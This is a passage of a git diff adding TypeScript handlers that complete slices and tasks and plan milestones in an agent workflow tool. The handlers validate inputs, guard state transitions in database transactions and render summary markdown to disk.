+function renderSliceSummaryMarkdown(params: CompleteSliceParams): string {
+  const now = new Date().toISOString();
+
+  // Apply defaults for optional enrichment arrays (#2771)
+  const provides = params.provides ?? [];
+  const requires = params.requires ?? [];
+  const affects = params.affects ?? [];
+  const keyFiles = params.keyFiles ?? [];
+  const keyDecisions = params.keyDecisions ?? [];
+  const patternsEstablished = params.patternsEstablished ?? [];
+  const observabilitySurfaces = params.observabilitySurfaces ?? [];
+  const drillDownPaths = params.drillDownPaths ?? [];
+  const requirementsAdvanced = params.requirementsAdvanced ?? [];
+  const requirementsValidated = params.requirementsValidated ?? [];
+  const requirementsSurfaced = params.requirementsSurfaced ?? [];
+  const requirementsInvalidated = params.requirementsInvalidated ?? [];
+  const filesModified = params.filesModified ?? [];
+
+  const providesYaml = provides.length > 0
+    ? provides.map(p => `  - ${p}`).join("\n")
+    : "  - (none)";
+
+  const requiresYaml = requires.length > 0
+    ? requires.map(r => `  - slice: ${r.slice}\n    provides: ${r.provides}`).join("\n")
+    : "  []";
+
+  const affectsYaml = affects.length > 0
+    ? affects.map(a => `  - ${a}`).join("\n")
+    : "  []";
+
+  const keyFilesYaml = keyFiles.length > 0
+    ? keyFiles.map(f => `  - ${f}`).join("\n")
+    : "  - (none)";
+
+  const keyDecisionsYaml = keyDecisions.length > 0
+    ? keyDecisions.map(d => `  - ${d}`).join("\n")
+    : "  - (none)";
+
+  const patternsYaml = patternsEstablished.length > 0
+    ? patternsEstablished.map(p => `  - ${p}`).join("\n")
+    : "  - (none)";
+
+  const observabilityYaml = observabilitySurfaces.length > 0
+    ? observabilitySurfaces.map(o => `  - ${o}`).join("\n")
+    : "  - none";
+
+  const drillDownYaml = drillDownPaths.length > 0
+    ? drillDownPaths.map(d => `  - ${d}`).join("\n")
+    : "  []";
+
+  // Requirements sections
+  const reqAdvanced = requirementsAdvanced.length > 0
+    ? requirementsAdvanced.map(r => `- ${r.id} — ${r.how}`).join("\n")
+    : "None.";
+
+  const reqValidated = requirementsValidated.length > 0
+    ? requirementsValidated.map(r => `- ${r.id} — ${r.proof}`).join("\n")
+    : "None.";
+
+  const reqSurfaced = requirementsSurfaced.length > 0
+    ? requirementsSurfaced.map(r => `- ${r}`).join("\n")
+    : "None.";
+
+  const reqInvalidated = requirementsInvalidated.length > 0
+    ? requirementsInvalidated.map(r => `- ${r.id} — ${r.what}`).join("\n")
+    : "None.";
+
+  // Files modified
+  const filesMod = filesModified.length > 0
+    ? filesModified.map(f => `- \`${f.path}\` — ${f.description}`).join("\n")
+    : "None.";
+
+  return `---
+id: ${params.sliceId}
+parent: ${params.milestoneId}
+milestone: ${params.milestoneId}
+provides:
+${providesYaml}
+requires:
+${requiresYaml}
+affects:
+${affectsYaml}
+key_files:
+${keyFilesYaml}
+key_decisions:
+${keyDecisionsYaml}
+patterns_established:
+${patternsYaml}
+observability_surfaces:
+${observabilityYaml}
+drill_down_paths:
+${drillDownYaml}
+duration: ""
+verification_result: passed
+completed_at: ${now}
+blocker_discovered: false
+---
+
+# ${params.sliceId}: ${params.sliceTitle}
+
+**${params.oneLiner}**
+
+## What Happened
+
+${params.narrative}
+
+## Verification
+
+${params.verification}
+
+## Requirements Advanced
+
+${reqAdvanced}
+
+## Requirements Validated
+
+${reqValidated}
+
+## New Requirements Surfaced
+
+${reqSurfaced}
+
+## Requirements Invalidated or Re-scoped
+
+${reqInvalidated}
+
+## Deviations
+
+${params.deviations || "None."}
+
+## Known Limitations
+
+${params.knownLimitations || "None."}
+
+## Follow-ups
+
+${params.followUps || "None."}
+
+## Files Created/Modified
+
+${filesMod}
+`;
+}
+
+/**
+ * Render UAT markdown matching the template format.
+ */
+function renderUatMarkdown(params: CompleteSliceParams): string {
+  return `# ${params.sliceId}: ${params.sliceTitle} — UAT
+
+**Milestone:** ${params.milestoneId}
+**Written:** ${new Date().toISOString()}
+
+${params.uatContent}
+`;
+}
+
+/**
+ * Handle the complete_slice operation end-to-end.
+ *
+ * 1. Validate required fields
+ * 2. Verify all tasks are complete
+ * 3. Write DB in a transaction (milestone, slice upsert, status update)
+ * 4. Render SUMMARY.md + UAT.md to disk
+ * 5. Toggle roadmap checkbox
+ * 6. Store rendered markdown back in DB (for D004 recovery)
+ * 7. Invalidate caches
+ */
+export async function handleCompleteSlice(
+  params: CompleteSliceParams,
+  basePath: string,
+): Promise<CompleteSliceResult | { error: string }> {
+  // ── Validate required fields ────────────────────────────────────────────
+  if (!params.sliceId || typeof params.sliceId !== "string" || params.sliceId.trim() === "") {
+    return { error: "sliceId is required and must be a non-empty string" };
+  }
+  if (!params.milestoneId || typeof params.milestoneId !== "string" || params.milestoneId.trim() === "") {
+    return { error: "milestoneId is required and must be a non-empty string" };
+  }
+
+  // ── Ownership check (opt-in: only enforced when claim file exists) ──────
+  const ownershipErr = checkOwnership(
+    basePath,
+    sliceUnitKey(params.milestoneId, params.sliceId),
+    params.actorName,
+  );
+  if (ownershipErr) {
+    return { error: ownershipErr };
+  }
+
+  // ── Verification content gate (#3580) ──────────────────────────────────
+  // Reject completion when the provided verification/UAT clearly indicates
+  // the slice is blocked or failed. Prevents prompt regressions from
+  // silently advancing blocked slices.
+  const BLOCKED_SIGNALS = /\b(status:\s*blocked|verification_result:\s*failed|slice is blocked|cannot complete|verification failed)\b/i;
+  if (BLOCKED_SIGNALS.test(params.verification || "") || BLOCKED_SIGNALS.test(params.uatContent || "")) {
+    return { error: `slice verification indicates blocked/failed state — do not complete a slice that has not passed verification. Address the blockers and re-verify first.` };
+  }
+
+  // ── Guards + DB writes inside a single transaction (prevents TOCTOU) ───
+  const completedAt = new Date().toISOString();
+  const originalSliceStatus = getSlice(params.milestoneId, params.sliceId)?.status ?? "pending";
+  let guardError: string | null = null;
+
+  transaction(() => {
+    // State machine preconditions (inside txn for atomicity).
+    // Milestone/slice not existing is OK — insertMilestone/insertSlice below will auto-create.
+    // Only block if they exist and are closed.
+    const milestone = getMilestone(params.milestoneId);
+    if (milestone && isClosedStatus(milestone.status)) {
+      guardError = `cannot complete slice in a closed milestone: ${params.milestoneId} (status: ${milestone.status})`;
+      return;
+    }
+
+    const slice = getSlice(params.milestoneId, params.sliceId);
+    if (slice && isClosedStatus(slice.status)) {
+      guardError = `slice ${params.sliceId} is already complete — use gsd_slice_reopen first if you need to redo it`;
+      return;
+    }
+
+    // Verify all tasks are complete
+    const tasks = getSliceTasks(params.milestoneId, params.sliceId);
+    if (tasks.length === 0) {
+      guardError = `no tasks found for slice ${params.sliceId} in milestone ${params.milestoneId}`;
+      return;
+    }
+
+    const incompleteTasks = tasks.filter(t => !isClosedStatus(t.status));
+    if (incompleteTasks.length > 0) {
+      const incompleteIds = incompleteTasks.map(t => `${t.id} (status: ${t.status})`).join(", ");
+      guardError = `incomplete tasks: ${incompleteIds}`;
+      return;
+    }
+
+    // All guards passed — perform writes
+    insertMilestone({ id: params.milestoneId, title: params.milestoneId });
+    insertSlice({ id: params.sliceId, milestoneId: params.milestoneId, title: params.sliceId });
+    updateSliceStatus(params.milestoneId, params.sliceId, "complete", completedAt);
+  });
+
+  if (guardError) {
+    return { error: guardError };
+  }
+
+  // ── Filesystem operations (outside transaction) ─────────────────────────
+  // If disk render fails, roll back the DB status so deriveState() and
+  // verifyExpectedArtifact() stay consistent (both say "not done").
+
+  // Render summary markdown
+  const summaryMd = renderSliceSummaryMarkdown(params);
+
+  // Resolve and write summary to disk
+  let summaryPath: string;
+  const sliceDir = resolveSlicePath(basePath, params.milestoneId, params.sliceId);
+  if (sliceDir) {
+    summaryPath = join(sliceDir, `${params.sliceId}-SUMMARY.md`);
+  } else {
+    // Slice dir doesn't exist on disk yet — build path manually and ensure dirs
+    const gsdDir = join(basePath, ".gsd");
+    const manualSliceDir = join(gsdDir, "milestones", params.milestoneId, "slices", params.sliceId);
+    mkdirSync(manualSliceDir, { recursive: true });
+    summaryPath = join(manualSliceDir, `${params.sliceId}-SUMMARY.md`);
+  }
+
+  const uatMd = renderUatMarkdown(params);
+  const uatPath = summaryPath.replace(/-SUMMARY\.md$/, "-UAT.md");
+
+  try {
+    await saveFile(summaryPath, summaryMd);
+    await saveFile(uatPath, uatMd);
+
+    // Toggle roadmap checkbox via renderer module
+    const roadmapToggled = await renderRoadmapCheckboxes(basePath, params.milestoneId);
+    if (!roadmapToggled) {
+      logWarning("tool", `complete_slice — could not find roadmap for ${params.milestoneId}, skipping checkbox toggle`);
+    }
+  } catch (renderErr) {
+    // Disk render failed — roll back DB status so state stays consistent
+    logWarning("tool", `complete_slice — disk render failed for ${params.milestoneId}/${params.sliceId}, rolling back DB status`, { error: (renderErr as Error).message });
+    updateSliceStatus(params.milestoneId, params.sliceId, originalSliceStatus);
+    invalidateStateCache();
+    return { error: `disk render failed: ${(renderErr as Error).message}` };
+  }
+
+  // Store rendered markdown in DB for D004 recovery
+  setSliceSummaryMd(params.milestoneId, params.sliceId, summaryMd, uatMd);
+
+  // Invalidate all caches
+  invalidateStateCache();
+  clearPathCache();
+  clearParseCache();
+
+  // ── Post-mutation hook: projections, manifest, event log ───────────────
+  // Separate try/catch per step so a projection failure doesn't prevent
+  // the event log entry (critical for worktree reconciliation).
+  try {
+    await renderAllProjections(basePath, params.milestoneId);
+  } catch (projErr) {
+    logWarning("tool", `complete-slice projection warning for ${params.milestoneId}/${params.sliceId}: ${(projErr as Error).message}`);
+  }
+  try {
+    writeManifest(basePath);
+  } catch (mfErr) {
+    logWarning("tool", `complete-slice manifest warning: ${(mfErr as Error).message}`);
+  }
+  try {
+    appendEvent(basePath, {
+      cmd: "complete-slice",
+      params: { milestoneId: params.milestoneId, sliceId: params.sliceId },
+      ts: new Date().toISOString(),
+      actor: "agent",
+      actor_name: params.actorName,
+      trigger_reason: params.triggerReason,
+    });
+  } catch (eventErr) {
+    logError("tool", `complete-slice event log FAILED — completion invisible to reconciliation`, { error: (eventErr as Error).message });
+  }
+
+  return {
+    sliceId: params.sliceId,
+    milestoneId: params.milestoneId,
+    summaryPath,
+    uatPath,
+  };
+}
diff --git a/src/resources/extensions/gsd/tools/complete-task.ts b/src/resources/extensions/gsd/tools/complete-task.ts
new file mode 100644
index 000000000..00cfa78d8
--- /dev/null
+++ b/src/resources/extensions/gsd/tools/complete-task.ts
@@ -0,0 +1,276 @@
+/**
+ * complete-task handler — the core operation behind gsd_complete_task.
+ *
+ * Validates inputs, writes task row to DB in a transaction, then (outside
+ * the transaction) renders SUMMARY.md to disk, toggles the plan checkbox,
+ * stores the rendered markdown in the DB for D004 recovery, and invalidates
+ * caches.
+ */
+
+import { join } from "node:path";
+import { mkdirSync, existsSync } from "node:fs";
+
+import type { CompleteTaskParams } from "../types.js";
+import { isClosedStatus } from "../status-guards.js";
+import {
+  transaction,
+  insertMilestone,
+  insertSlice,
+  insertTask,
+  insertVerificationEvidence,
+  getMilestone,
+  getSlice,
+  getTask,
+  updateTaskStatus,
+  setTaskSummaryMd,
+  deleteVerificationEvidence,
+} from "../gsd-db.js";
+import { resolveSliceFile, resolveTasksDir, clearPathCache } from "../paths.js";
+import { checkOwnership, taskUnitKey } from "../unit-ownership.js";
+import { saveFile, clearParseCache } from "../files.js";
+import { invalidateStateCache } from "../state.js";
+import { renderPlanCheckboxes } from "../markdown-renderer.js";
+import { renderAllProjections, renderSummaryContent } from "../workflow-projections.js";
+import { writeManifest } from "../workflow-manifest.js";
+import { appendEvent } from "../workflow-events.js";
+import { logWarning, logError } from "../workflow-logger.js";
+
+export interface CompleteTaskResult {
+  taskId: string;
+  sliceId: string;
+  milestoneId: string;
+  summaryPath: string;
+}
+
+import type { TaskRow } from "../gsd-db.js";
+
+/**
+ * Normalize a list parameter that may arrive as a string (newline-delimited
+ * bullet list from the LLM) into a string array (#3361).
+ */
+function normalizeListParam(value: unknown): string[] {
+  if (Array.isArray(value)) return value.map(String);
+  if (typeof value === "string" && value.trim()) {
+    return value.split(/\n/).map(s => s.replace(/^[\s\-*•]+/, "").trim()).filter(Boolean);
+  }
+  return [];
+}
+
+/**
+ * Build a TaskRow-shaped object from CompleteTaskParams so the unified
+ * renderSummaryContent() can be used at completion time (#2720).
+ */
+function paramsToTaskRow(params: CompleteTaskParams, completedAt: string): TaskRow {
+  return {
+    milestone_id: params.milestoneId,
+    slice_id: params.sliceId,
+    id: params.taskId,
+    title: params.oneLiner || params.taskId,
+    status: "complete",
+    one_liner: params.oneLiner,
+    narrative: params.narrative,
+    verification_result: params.verification,
+    duration: "",
+    completed_at: completedAt,
+    blocker_discovered: params.blockerDiscovered ?? false,
+    deviations: params.deviations ?? "",
+    known_issues: params.knownIssues ?? "",
+    key_files: normalizeListParam(params.keyFiles),
+    key_decisions: normalizeListParam(params.keyDecisions),
+    full_summary_md: "",
+    description: "",
+    estimate: "",
+    files: [],
+    verify: "",
+    inputs: [],
+    expected_output: [],
+    observability_impact: "",
+    full_plan_md: "",
+    sequence: 0,
+  };
+}
+
+/**
+ * Handle the complete_task operation end-to-end.
+ *
+ * 1. Validate required fields
+ * 2. Write DB in a transaction (milestone, slice, task, verification evidence)
+ * 3. Render SUMMARY.md to disk
+ * 4. Toggle plan checkbox
+ * 5. Store rendered markdown back in DB (for D004 recovery)
+ * 6. Invalidate caches
+ */
+export async function handleCompleteTask(
+  params: CompleteTaskParams,
+  basePath: string,
+): Promise<CompleteTaskResult | { error: string }> {
+  // ── Validate required fields ────────────────────────────────────────────
+  if (!params.taskId || typeof params.taskId !== "string" || params.taskId.trim() === "") {
+    return { error: "taskId is required and must be a non-empty string" };
+  }
+  if (!params.sliceId || typeof params.sliceId !== "string" || params.sliceId.trim() === "") {
+    return { error: "sliceId is required and must be a non-empty string" };
+  }
+  if (!params.milestoneId || typeof params.milestoneId !== "string" || params.milestoneId.trim() === "") {
+    return { error: "milestoneId is required and must be a non-empty string" };
+  }
+
+  // ── Ownership check (opt-in: only enforced when claim file exists) ──────
+  const ownershipErr = checkOwnership(
+    basePath,
+    taskUnitKey(params.milestoneId, params.sliceId, params.taskId),
+    params.actorName,
+  );
+  if (ownershipErr) {
+    return { error: ownershipErr };
+  }
+
+  // ── Guards + DB writes inside a single transaction (prevents TOCTOU) ───
+  const completedAt = new Date().toISOString();
+  let guardError: string | null = null;
+
+  transaction(() => {
+    // State machine preconditions (inside txn for atomicity).
+    // Milestone/slice not existing is OK — insertMilestone/insertSlice below will auto-create.
+    // Only block if they exist and are closed.
+    const milestone = getMilestone(params.milestoneId);
+    if (milestone && isClosedStatus(milestone.status)) {
+      guardError = `cannot complete task in a closed milestone: ${params.milestoneId} (status: ${milestone.status})`;
+      return;
+    }
+
+    const slice = getSlice(params.milestoneId, params.sliceId);
+    if (slice && isClosedStatus(slice.status)) {
+      guardError = `cannot complete task in a closed slice: ${params.sliceId} (status: ${slice.status})`;
+      return;
+    }
+
+    const existingTask = getTask(params.milestoneId, params.sliceId, params.taskId);
+    if (existingTask && isClosedStatus(existingTask.status)) {
+      guardError = `task ${params.taskId} is already complete — use gsd_task_reopen first if you need to redo it`;
+      return;
+    }
+
+    // All guards passed — perform writes
+    insertMilestone({ id: params.milestoneId, title: params.milestoneId });
+    insertSlice({ id: params.sliceId, milestoneId: params.milestoneId, title: params.sliceId });
+    insertTask({
+      id: params.taskId,
+      sliceId: params.sliceId,
+      milestoneId: params.milestoneId,
+      title: params.oneLiner,
+      status: "complete",
+      oneLiner: params.oneLiner,
+      narrative: params.narrative,
+      verificationResult: params.verification,
+      duration: "",
+      blockerDiscovered: params.blockerDiscovered ?? false,
+      deviations: params.deviations ?? "None.",
+      knownIssues: params.knownIssues ?? "None.",
+      keyFiles: params.keyFiles ?? [],
+      keyDecisions: params.keyDecisions ?? [],
+    });
+
+    for (const evidence of (params.verificationEvidence ?? [])) {
+      insertVerificationEvidence({
+        taskId: params.taskId,
+        sliceId: params.sliceId,
+        milestoneId: params.milestoneId,
+        command: evidence.command,
+        exitCode: evidence.exitCode,
+        verdict: evidence.verdict,
+        durationMs: evidence.durationMs,
+      });
+    }
+  });
+
+  if (guardError) {
+    return { error: guardError };
+  }
+
+  // ── Filesystem operations (outside transaction) ─────────────────────────
+  // If disk render fails, roll back the DB status so deriveState() and
+  // verifyExpectedArtifact() stay consistent (both say "not done").
+
+  // Render summary markdown via the single source of truth (#2720)
+  const taskRow = paramsToTaskRow(params, completedAt);
+  const summaryMd = renderSummaryContent(taskRow, params.sliceId, params.milestoneId, params.verificationEvidence ?? []);
+
+  // Resolve and write summary to disk
+  let summaryPath: string;
+  const tasksDir = resolveTasksDir(basePath, params.milestoneId, params.sliceId);
+  if (tasksDir) {
+    summaryPath = join(tasksDir, `${params.taskId}-SUMMARY.md`);
+  } else {
+    // Tasks dir doesn't exist on disk yet — build path manually and ensure dirs
+    const gsdDir = join(basePath, ".gsd");
+    const manualTasksDir = join(gsdDir, "milestones", params.milestoneId, "slices", params.sliceId, "tasks");
+    mkdirSync(manualTasksDir, { recursive: true });
+    summaryPath = join(manualTasksDir, `${params.taskId}-SUMMARY.md`);
+  }
+
+  try {
+    await saveFile(summaryPath, summaryMd);
+
+    // Toggle plan checkbox via renderer module
+    const planPath = resolveSliceFile(basePath, params.milestoneId, params.sliceId, "PLAN");
+    if (planPath) {
+      await renderPlanCheckboxes(basePath, params.milestoneId, params.sliceId);
+    } else {
+      process.stderr.write(
+        `gsd-db: complete_task — could not find plan file for ${params.sliceId}/${params.milestoneId}, skipping checkbox toggle\n`,
+      );
+    }
+  } catch (renderErr) {
+    // Disk render failed — roll back DB status so state stays consistent
+    logWarning("tool", `complete_task — disk render failed, rolling back DB status: ${(renderErr as Error).message}`);
+    // Delete orphaned verification_evidence rows first (FK constraint
+    // references tasks, so evidence must go before status change).
+    // Without this, retries accumulate duplicate evidence rows (#2724).
+    deleteVerificationEvidence(params.milestoneId, params.sliceId, params.taskId);
+    updateTaskStatus(params.milestoneId, params.sliceId, params.taskId, 'pending');
+    invalidateStateCache();
+    return { error: `disk render failed: ${(renderErr as Error).message}` };
+  }
+
+  // Store rendered markdown in DB for D004 recovery
+  setTaskSummaryMd(params.milestoneId, params.sliceId, params.taskId, summaryMd);
+
+  // Invalidate all caches
+  invalidateStateCache();
+  clearPathCache();
+  clearParseCache();
+
+  // ── Post-mutation hook: projections, manifest, event log ───────────────
+  // Separate try/catch per step so a projection failure doesn't prevent
+  // the event log entry (critical for worktree reconciliation).
+  try {
+    await renderAllProjections(basePath, params.milestoneId);
+  } catch (projErr) {
+    logWarning("tool", `complete-task projection warning: ${(projErr as Error).message}`);
+  }
+  try {
+    writeManifest(basePath);
+  } catch (mfErr) {
+    logWarning("tool", `complete-task manifest warning: ${(mfErr as Error).message}`);
+  }
+  try {
+    appendEvent(basePath, {
+      cmd: "complete-task",
+      params: { milestoneId: params.milestoneId, sliceId: params.sliceId, taskId: params.taskId },
+      ts: new Date().toISOString(),
+      actor: "agent",
+      actor_name: params.actorName,
+      trigger_reason: params.triggerReason,
+    });
+  } catch (eventErr) {
+    logError("tool", `complete-task event log FAILED — completion invisible to reconciliation`, { error: (eventErr as Error).message });
+  }
+
+  return {
+    taskId: params.taskId,
+    sliceId: params.sliceId,
+    milestoneId: params.milestoneId,
+    summaryPath,
+  };
+}
diff --git a/src/resources/extensions/gsd/tools/plan-milestone.ts b/src/resources/extensions/gsd/tools/plan-milestone.ts
new file mode 100644
index 000000000..cc24aeb2a
--- /dev/null
+++ b/src/resources/extensions/gsd/tools/plan-milestone.ts
@@ -0,0 +1,328 @@
+import { clearParseCache } from "../files.js";
+import { isClosedStatus } from "../status-guards.js";
+import { isNonEmptyString, validateStringArray } from "../validation.js";
+import {
+  transaction,
+  getMilestone,
+  getMilestoneSlices,
+  getSlice,
+  insertMilestone,
+  insertSlice,
+  upsertMilestonePlanning,
+  upsertSlicePlanning,
+} from "../gsd-db.js";
+import { invalidateStateCache } from "../state.js";
+import { renderRoadmapFromDb } from "../markdown-renderer.js";
+import { renderAllProjections } from "../workflow-projections.js";
+import { writeManifest } from "../workflow-manifest.js";
+import { appendEvent } from "../workflow-events.js";
+import { logWarning } from "../workflow-logger.js";
+
+export interface PlanMilestoneSliceInput {
+  sliceId: string;
+  title: string;
+  risk: string;
+  depends: string[];
+  demo: string;
+  goal: string;
+  successCriteria: string;
+  proofLevel: string;
+  integrationClosure: string;
+  observabilityImpact: string;
+}
+
+export interface PlanMilestoneParams {
+  milestoneId: string;
+  title: string;
+  vision: string;
+  slices: PlanMilestoneSliceInput[];
+  status?: string;
+  dependsOn?: string[];
+  /** Optional caller-provided identity for audit trail */
+  actorName?: string;
+  /** Optional caller-provided reason this action was triggered */
+  triggerReason?: string;
+  /** @optional — defaults to [] when omitted by models with limited tool-calling */
+  successCriteria?: string[];
+  /** @optional — defaults to [] when omitted */
+  keyRisks?: Array<{ risk: string; whyItMatters: string }>;
+  /** @optional — defaults to [] when omitted */
+  proofStrategy?: Array<{ riskOrUnknown: string; retireIn: string; whatWillBeProven: string }>;
+  /** @optional — defaults to "" when omitted */
+  verificationContract?: string;
+  /** @optional — defaults to "" when omitted */
+  verificationIntegration?: string;
+  /** @optional — defaults to "" when omitted */
+  verificationOperational?: string;
+  /** @optional — defaults to "" when omitted */
+  verificationUat?: string;
+  /** @optional — defaults to [] when omitted */
+  definitionOfDone?: string[];
+  /** @optional — defaults to "Not provided." when omitted */
+  requirementCoverage?: string;
+  /** @optional — defaults to "Not provided." when omitted */
+  boundaryMapMarkdown?: string;
+}
+
+export interface PlanMilestoneResult {
+  milestoneId: string;
+  roadmapPath: string;
+}
+
+function validateRiskEntries(value: unknown): Array<{ risk: string; whyItMatters: string }> {
+  if (!Array.isArray(value)) {
+    throw new Error("keyRisks must be an array");
+  }
+  return value.map((entry, index) => {
+    if (!entry || typeof entry !== "object") {
+      throw new Error(`keyRisks[${index}] must be an object`);
+    }
+    const risk = (entry as Record<string, unknown>).risk;
+    const whyItMatters = (entry as Record<string, unknown>).whyItMatters;
+    if (!isNonEmptyString(risk) || !isNonEmptyString(whyItMatters)) {
+      throw new Error(`keyRisks[${index}] must include non-empty risk and whyItMatters`);
+    }
+    return { risk, whyItMatters };
+  });
+}
+
+function validateProofStrategy(value: unknown): Array<{ riskOrUnknown: string; retireIn: string; whatWillBeProven: string }> {
+  if (!Array.isArray(value)) {
+    throw new Error("proofStrategy must be an array");
+  }
+  return value.map((entry, index) => {
+    if (!entry || typeof entry !== "object") {
+      throw new Error(`proofStrategy[${index}] must be an object`);
+    }
+    const riskOrUnknown = (entry as Record<string, unknown>).riskOrUnknown;
+    const retireIn = (entry as Record<string, unknown>).retireIn;
+    const whatWillBeProven = (entry as Record<string, unknown>).whatWillBeProven;
+    if (!isNonEmptyString(riskOrUnknown) || !isNonEmptyString(retireIn) || !isNonEmptyString(whatWillBeProven)) {
+      throw new Error(`proofStrategy[${index}] must include non-empty riskOrUnknown, retireIn, and whatWillBeProven`);
+    }
+    return { riskOrUnknown, retireIn, whatWillBeProven };
+  });
+}
+
+function validateSlices(value: unknown): PlanMilestoneSliceInput[] {
+  if (!Array.isArray(value) || value.length === 0) {
+    throw new Error("slices must be a non-empty array");
+  }
+
+  const seen = new Set<string>();
+  return value.map((entry, index) => {
+    if (!entry || typeof entry !== "object") {
+      throw new Error(`slices[${index}] must be an object`);
+    }
+    const obj = entry as Record<string, unknown>;
+    const sliceId = obj.sliceId;
+    const title = obj.title;
+    const risk = obj.risk;
+    const depends = obj.depends;
+    const demo = obj.demo;
+    const goal = obj.goal;
+    const successCriteria = obj.successCriteria;
+    const proofLevel = obj.proofLevel;
+    const integrationClosure = obj.integrationClosure;
+    const observabilityImpact = obj.observabilityImpact;
+
+    if (!isNonEmptyString(sliceId)) throw new Error(`slices[${index}].sliceId must be a non-empty string`);
+    if (seen.has(sliceId)) throw new Error(`slices[${index}].sliceId must be unique`);
+    seen.add(sliceId);
+    if (!isNonEmptyString(title)) throw new Error(`slices[${index}].title must be a non-empty string`);
+    if (!isNonEmptyString(risk)) throw new Error(`slices[${index}].risk must be a non-empty string`);
+    if (!Array.isArray(depends) || depends.some((item) => !isNonEmptyString(item))) {
+      throw new Error(`slices[${index}].depends must be an array of non-empty strings`);
+    }
+    if (!isNonEmptyString(demo)) throw new Error(`slices[${index}].demo must be a non-empty string`);
+    if (!isNonEmptyString(goal)) throw new Error(`slices[${index}].goal must be a non-empty string`);
+    if (!isNonEmptyString(successCriteria)) throw new Error(`slices[${index}].successCriteria must be a non-empty string`);
+    if (!isNonEmptyString(proofLevel)) throw new Error(`slices[${index}].proofLevel must be a non-empty string`);
+    if (!isNonEmptyString(integrationClosure)) throw new Error(`slices[${index}].integrationClosure must be a non-empty string`);
+    if (!isNonEmptyString(observabilityImpact)) throw new Error(`slices[${index}].observabilityImpact must be a non-empty string`);
+
+    return {
+      sliceId,
+      title,
+      risk,
+      depends,
+      demo,
+      goal,
+      successCriteria,
+      proofLevel,
+      integrationClosure,
+      observabilityImpact,
+    };
+  });
+}
+
+function validateParams(params: PlanMilestoneParams): PlanMilestoneParams {
+  if (!isNonEmptyString(params?.milestoneId)) throw new Error("milestoneId is required");
+  if (!isNonEmptyString(params?.title)) throw new Error("title is required");
+  if (!isNonEmptyString(params?.vision)) throw new Error("vision is required");
+
+  return {
+    ...params,
+    dependsOn: params.dependsOn ? validateStringArray(params.dependsOn, "dependsOn") : [],
+    // Apply defaults for optional enrichment fields (#2771)
+    successCriteria: params.successCriteria ? validateStringArray(params.successCriteria, "successCriteria") : [],
+    keyRisks: params.keyRisks ? validateRiskEntries(params.keyRisks) : [],
+    proofStrategy: params.proofStrategy ? validateProofStrategy(params.proofStrategy) : [],
+    verificationContract: params.verificationContract ?? "",
+    verificationIntegration: params.verificationIntegration ?? "",
+    verificationOperational: params.verificationOperational ?? "",
+    verificationUat: params.verificationUat ?? "",
+    definitionOfDone: params.definitionOfDone ? validateStringArray(params.definitionOfDone, "definitionOfDone") : [],
+    requirementCoverage: params.requirementCoverage ?? "Not provided.",
+    boundaryMapMarkdown: params.boundaryMapMarkdown ?? "Not provided.",
+    slices: validateSlices(params.slices),
+  };
+}
+
+export async function handlePlanMilestone(
+  rawParams: PlanMilestoneParams,
+  basePath: string,
+): Promise<PlanMilestoneResult | { error: string }> {
+  let params: PlanMilestoneParams;
+  try {
+    params = validateParams(rawParams);
+  } catch (err) {
+    return { error: `validation failed: ${(err as Error).message}` };
+  }
+
+  // ── Guards + DB writes inside a single transaction (prevents TOCTOU) ───
+  // Guards must be inside the transaction so the state they check cannot
+  // change between the read and the write (#2723).
+  let guardError: string | null = null;
+
+  try {
+    transaction(() => {
+      const existingMilestone = getMilestone(params.milestoneId);
+      if (existingMilestone && isClosedStatus(existingMilestone.status)) {
+        guardError = `cannot re-plan milestone ${params.milestoneId}: it is already complete`;
+        return;
+      }
+
+      // Guard: refuse to re-plan a milestone that would drop completed slices (#2960).
+      // Allow re-planning when all completed slices are still present in the
+      // incoming plan — their status is preserved below (#2558). Block only when
+      // the new plan omits a completed slice, which could shadow completed work.
+      const existingSlices = getMilestoneSlices(params.milestoneId);
+      const completedSlices = existingSlices.filter(s => isClosedStatus(s.status));
+      if (completedSlices.length > 0) {
+        const incomingSliceIds = new Set(params.slices.map(s => s.sliceId));
+        const droppedCompleted = completedSlices.filter(s => !incomingSliceIds.has(s.id));
+        if (droppedCompleted.length > 0) {
+          guardError = `cannot re-plan milestone ${params.milestoneId}: ${droppedCompleted.length} completed slice(s) would be dropped (${droppedCompleted.map(s => s.id).join(", ")}). Use gsd_reassess_roadmap to modify the roadmap.`;
+          return;
+        }
+      }
+
+      // Validate depends_on: all dependencies must exist and be complete
+      if (params.dependsOn && params.dependsOn.length > 0) {
+        for (const depId of params.dependsOn) {
+          const dep = getMilestone(depId);
+          if (!dep) {
+            guardError = `depends_on references unknown milestone: ${depId}`;
+            return;
+          }
+          if (!isClosedStatus(dep.status)) {
+            guardError = `depends_on milestone ${depId} is not yet complete (status: ${dep.status})`;
+            return;
+          }
+        }
+      }
+
+      insertMilestone({
+        id: params.milestoneId,
+        title: params.title,
+        status: params.status ?? "active",
+        depends_on: params.dependsOn ?? [],
+      });
+
+      upsertMilestonePlanning(params.milestoneId, {
+        title: params.title,
+        status: params.status ?? "active",
+        vision: params.vision,
+        successCriteria: params.successCriteria,
+        keyRisks: params.keyRisks,
+        proofStrategy: params.proofStrategy,
+        verificationContract: params.verificationContract,
+        verificationIntegration: params.verificationIntegration,
+        verificationOperational: params.verificationOperational,
+        verificationUat: params.verificationUat,
+        definitionOfDone: params.definitionOfDone,
+        requirementCoverage: params.requirementCoverage,
+        boundaryMapMarkdown: params.boundaryMapMarkdown,
+      });
+
+      for (let i = 0; i < params.slices.length; i++) {
+        const slice = params.slices[i]!;
+        // Preserve completed/done status on re-plan (#2558).
+        // Without this, a re-plan after milestone transition would reset
+        // already-completed slices back to "pending".
+        const existing = getSlice(params.milestoneId, slice.sliceId);
+        const status = existing && (existing.status === "complete" || existing.status === "done")
+          ? existing.status
+          : "pending";
+        insertSlice({
+          id: slice.sliceId,
+          milestoneId: params.milestoneId,
+          title: slice.title,
+          status,
+          risk: slice.risk,
+          depends: slice.depends,
+          demo: slice.demo,
+          sequence: i + 1, // Preserve agent-ordered sequence (#3356)
+        });
+        upsertSlicePlanning(params.milestoneId, slice.sliceId, {
+          goal: slice.goal,
+          successCriteria: slice.successCriteria,
+          proofLevel: slice.proofLevel,
+          integrationClosure: slice.integrationClosure,
+          observabilityImpact: slice.observabilityImpact,
+        });
+      }
+    });
+  } catch (err) {
+    return { error: `db write failed: ${(err as Error).message}` };
+  }
+
+  if (guardError) {
+    return { error: guardError };
+  }
+
+  let roadmapPath: string;
+  try {
+    const renderResult = await renderRoadmapFromDb(basePath, params.milestoneId);
+    roadmapPath = renderResult.roadmapPath;
